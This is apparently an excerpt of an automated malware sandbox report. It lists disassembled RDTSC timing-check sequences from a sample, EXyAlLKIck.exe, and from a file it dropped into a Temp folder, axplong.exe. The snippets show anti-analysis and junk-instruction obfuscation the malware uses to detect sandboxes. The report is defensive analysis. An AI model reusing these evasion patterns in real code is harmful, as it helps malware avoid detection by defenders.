Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50B0A56 second address: 50B0A9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 jmp 00007FE5B8D9CB5Bh 0x0000000e mov esp, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FE5B8D9CB5Bh 0x00000019 and cl, FFFFFFEEh 0x0000001c jmp 00007FE5B8D9CB69h 0x00000021 popfd 0x00000022 movzx esi, bx 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50B0A9C second address: 50B0AE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FE5B8F4A756h 0x0000000b xor al, FFFFFF98h 0x0000000e jmp 00007FE5B8F4A74Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FE5B8F4A755h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50C0D5E second address: 50C0DA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FE5B8D9CB5Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FE5B8D9CB5Ch 0x00000019 sub cx, 5BB8h 0x0000001e jmp 00007FE5B8D9CB5Bh 0x00000023 popfd 0x00000024 push esi 0x00000025 pop edx 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50C0DA7 second address: 50C0DAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50C0DAD second address: 50C0DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50C0DB1 second address: 50C0DB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50C0A96 second address: 50C0B2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FE5B8D9CB66h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FE5B8D9CB5Eh 0x00000018 add cl, FFFFFFF8h 0x0000001b jmp 00007FE5B8D9CB5Bh 0x00000020 popfd 0x00000021 call 00007FE5B8D9CB68h 0x00000026 pushfd 0x00000027 jmp 00007FE5B8D9CB62h 0x0000002c jmp 00007FE5B8D9CB65h 0x00000031 popfd 0x00000032 pop esi 0x00000033 popad 0x00000034 pop ebp 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FE5B8D9CB5Ah 0x0000003c rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50C0B2D second address: 50C0B33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50C0B33 second address: 50C0B37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 5140820 second address: 5140824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 5140824 second address: 5140828 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 5140828 second address: 514082E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 514082E second address: 514083D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8D9CB5Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 514083D second address: 5140853 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE5B8F4A74Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 5140853 second address: 514086B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8D9CB64h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 514086B second address: 514086F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 514086F second address: 51408D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FE5B8D9CB5Dh 0x00000010 add al, 00000066h 0x00000013 jmp 00007FE5B8D9CB61h 0x00000018 popfd 0x00000019 pushfd 0x0000001a jmp 00007FE5B8D9CB60h 0x0000001f adc cx, 9808h 0x00000024 jmp 00007FE5B8D9CB5Bh 0x00000029 popfd 0x0000002a popad 0x0000002b mov ebp, esp 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FE5B8D9CB60h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 51408D5 second address: 51408DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 51408DB second address: 51408E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 51408E1 second address: 51408E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 5130913 second address: 5130919 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 5130B98 second address: 5130B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 5130B9C second address: 5130BA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 5130BA2 second address: 5130BF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A754h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ax, dx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007FE5B8F4A753h 0x00000016 sbb ecx, 68B30D8Eh 0x0000001c jmp 00007FE5B8F4A759h 0x00000021 popfd 0x00000022 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 5130CDB second address: 5130CDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 5130CDF second address: 5130CEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A74Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 5130CEE second address: 5130CF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 5130CF4 second address: 5130CF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 96A32C second address: 96A330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 96A330 second address: 96A334 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 885C73 second address: 885C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 87B7E4 second address: 87B7EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 87B7EA second address: 87B80A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE5B8D9CB62h 0x0000000d jc 00007FE5B8D9CB56h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 87B80A second address: 87B80E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 87B80E second address: 87B81A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FE5B8D9CB56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 885045 second address: 885064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007FE5B8F4A752h 0x0000000b js 00007FE5B8F4A746h 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 885064 second address: 885078 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE5B8D9CB5Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 88537A second address: 88538A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE5B8F4A746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 88538A second address: 885393 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 885393 second address: 8853AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FE5B8F4A746h 0x00000014 jo 00007FE5B8F4A746h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 8853AD second address: 8853C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 88551C second address: 88553B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FE5B8F4A746h 0x0000000a pop ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FE5B8F4A74Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 88553B second address: 88555C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FE5B8D9CB68h 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 887978 second address: 887982 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FE5B8F4A746h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 887982 second address: 887986 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 887A07 second address: 887A9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 nop 0x00000008 mov edx, eax 0x0000000a push 00000000h 0x0000000c mov edi, ebx 0x0000000e push 30A59EDFh 0x00000013 jmp 00007FE5B8F4A754h 0x00000018 xor dword ptr [esp], 30A59E5Fh 0x0000001f adc dx, 377Ah 0x00000024 push 00000003h 0x00000026 push 00000000h 0x00000028 push eax 0x00000029 call 00007FE5B8F4A748h 0x0000002e pop eax 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 add dword ptr [esp+04h], 0000001Ch 0x0000003b inc eax 0x0000003c push eax 0x0000003d ret 0x0000003e pop eax 0x0000003f ret 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push esi 0x00000045 call 00007FE5B8F4A748h 0x0000004a pop esi 0x0000004b mov dword ptr [esp+04h], esi 0x0000004f add dword ptr [esp+04h], 00000019h 0x00000057 inc esi 0x00000058 push esi 0x00000059 ret 0x0000005a pop esi 0x0000005b ret 0x0000005c push 00000003h 0x0000005e mov di, 44B1h 0x00000062 push 8CDCC9A9h 0x00000067 pushad 0x00000068 jnp 00007FE5B8F4A748h 0x0000006e push eax 0x0000006f push edx 0x00000070 je 00007FE5B8F4A746h 0x00000076 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 887A9F second address: 887AF2 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE5B8D9CB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b add dword ptr [esp], 33233657h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007FE5B8D9CB58h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c mov dword ptr [ebp+122D3603h], ecx 0x00000032 lea ebx, dword ptr [ebp+1244C89Fh] 0x00000038 mov si, 1805h 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push ebx 0x00000040 jmp 00007FE5B8D9CB5Ah 0x00000045 pop ebx 0x00000046 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 887C67 second address: 887C83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8F4A758h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 887C83 second address: 887CAE instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE5B8D9CB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007FE5B8D9CB5Fh 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jnl 00007FE5B8D9CB56h 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 887CAE second address: 887CB4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E06C6 second address: 50E06CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E06CC second address: 50E06DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8F4A74Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E06DD second address: 50E0709 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr fs:[00000000h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FE5B8D9CB5Dh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E0709 second address: 50E070F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E070F second address: 50E0762 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007FE5B8D9CB64h 0x0000000e mov dword ptr [esp], eax 0x00000011 jmp 00007FE5B8D9CB60h 0x00000016 sub esp, 1Ch 0x00000019 pushad 0x0000001a mov edx, esi 0x0000001c mov eax, 251A6549h 0x00000021 popad 0x00000022 xchg eax, ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 jmp 00007FE5B8D9CB61h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E0762 second address: 50E0767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E0767 second address: 50E07AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FE5B8D9CB69h 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FE5B8D9CB5Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E07AC second address: 50E07DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A751h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE5B8F4A758h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E07DE second address: 50E07E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E07E2 second address: 50E07E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E07E8 second address: 50E080F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FE5B8D9CB5Bh 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 mov dx, si 0x00000014 push eax 0x00000015 push edx 0x00000016 mov ebx, esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E080F second address: 50E084D instructions: 0x00000000 rdtsc 0x00000002 mov di, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, edi 0x00000009 jmp 00007FE5B8F4A754h 0x0000000e push eax 0x0000000f jmp 00007FE5B8F4A74Bh 0x00000014 xchg eax, edi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FE5B8F4A750h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E084D second address: 50E0851 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E0851 second address: 50E0857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E0857 second address: 50E088B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [76FAB370h] 0x0000000e jmp 00007FE5B8D9CB60h 0x00000013 xor dword ptr [ebp-08h], eax 0x00000016 pushad 0x00000017 popad 0x00000018 xor eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E088B second address: 50E0891 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E0891 second address: 50E08C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edx 0x00000005 call 00007FE5B8D9CB62h 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esp 0x0000000f pushad 0x00000010 mov ax, C7D3h 0x00000014 popad 0x00000015 mov dword ptr [esp], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov ax, 507Dh 0x0000001f mov eax, 2F417779h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E08C3 second address: 50E0941 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE5B8F4A755h 0x00000009 sub eax, 564ED046h 0x0000000f jmp 00007FE5B8F4A751h 0x00000014 popfd 0x00000015 jmp 00007FE5B8F4A750h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d lea eax, dword ptr [ebp-10h] 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FE5B8F4A74Dh 0x00000029 or al, 00000056h 0x0000002c jmp 00007FE5B8F4A751h 0x00000031 popfd 0x00000032 jmp 00007FE5B8F4A750h 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E0941 second address: 50E0953 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8D9CB5Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E0953 second address: 50E0966 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr fs:[00000000h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E0966 second address: 50E096D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E096D second address: 50E0A2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A755h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d mov si, B723h 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FE5B8F4A755h 0x00000018 adc esi, 42B22F26h 0x0000001e jmp 00007FE5B8F4A751h 0x00000023 popfd 0x00000024 popad 0x00000025 popad 0x00000026 mov eax, dword ptr [esi+10h] 0x00000029 jmp 00007FE5B8F4A74Eh 0x0000002e test eax, eax 0x00000030 jmp 00007FE5B8F4A750h 0x00000035 jne 00007FE62AD19A88h 0x0000003b pushad 0x0000003c push eax 0x0000003d movsx edx, ax 0x00000040 pop eax 0x00000041 mov si, di 0x00000044 popad 0x00000045 mov eax, 00000000h 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d pushad 0x0000004e popad 0x0000004f pushfd 0x00000050 jmp 00007FE5B8F4A759h 0x00000055 or eax, 32DCDB46h 0x0000005b jmp 00007FE5B8F4A751h 0x00000060 popfd 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E0A2F second address: 50E0A35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E0A35 second address: 50E0A39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E0A39 second address: 50E0A3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E0A3D second address: 50E0A62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [ebp-20h], eax 0x0000000b jmp 00007FE5B8F4A74Fh 0x00000010 mov ebx, dword ptr [esi] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov ax, bx 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
